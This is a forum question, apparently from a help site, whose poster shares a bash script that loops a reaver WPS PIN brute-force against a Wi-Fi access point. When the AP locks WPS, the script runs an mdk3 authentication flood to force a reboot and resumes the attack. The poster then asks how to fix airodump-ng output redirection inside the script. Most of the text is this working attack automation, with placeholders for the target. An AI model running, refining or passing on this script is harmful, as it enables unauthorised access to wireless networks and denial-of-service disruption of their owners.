First of all, sorry for my poor poor english. I'm trying to write a bash script in order to perform AP WPS cracking using reaver. The problem is that after trying some WPS-PINs, the AP lock the WPS so I reaver is not usefull.
To solve this, I perform a mdk3
attack to force the AP to reboot and be able to attack it again (after reboot, the WPS restarts in unlocked state).
The problem with this approach is that:
- I have to be in front of the PC locking when the AP is locked and
- making an mdk3 attack, stop it when the AP is rebooted and performing again the reaver attack. The solution to this is obviously a script.
I wrote the following lines which should solve this.
I have to say that I'm a total noob in bash scripting, so the script is not "professional", it just a "workarround" to solve my problem.
#!/bin/bash
while true; do
# Switch to the correct channel and save it into $channel
echo Detecting AP channel
timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
rm ap_channel 2> /dev/null
touch ap_channel
timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
rm ap_channel
# Attacks the AP while it isn't wps-locked
rm ap_status 2> /dev/null
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -z "$(grep Locked ap_status)" ]; do
echo Performing reaver attack
aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
mdk3_pid=$!
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
while [ -n "$(grep Locked ap_status)" ]; do
echo Trying to reboot the AP
rm ap_status
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
done
# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 2 mins till AP init
sleep 120
done
The problem in this script is that the stdout redirection that I use for airodump output run different if I execute it directly in the command line than if I execute it inside the script.
timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
I need a way to execute the line above within the script as if I execute it directly in the tty. I can't do this using exec because I need to continue with the script.
NOTE: I can't use the -w option for airodump-ng because it doesn't save the WPS status.
Could someone please help me with this?